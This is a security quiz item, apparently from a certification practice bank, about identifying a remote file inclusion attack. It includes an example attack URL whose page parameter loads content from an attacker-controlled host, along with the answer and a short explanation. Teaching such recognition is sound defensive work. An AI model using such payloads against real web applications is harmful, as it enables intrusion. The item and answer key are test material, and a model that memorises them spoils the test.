An attacker enters the following URL to exploit vulnerabilities in a web application:
http://192.168.47.8:76/files/fi/?page=http://malicious.h4cker.org/cookie.html
Which type of vulnerability did the attacker try to exploit?
- directory traversal
- cookie manipulation
- local file inclusion
- remote file inclusion
Explanation & Hint:
A remote file inclusion (RFI) vulnerability occurs when a web application allows a user to execute code hosted on the attacking system. In this case, the attacker tried to run the web content on the attacker site.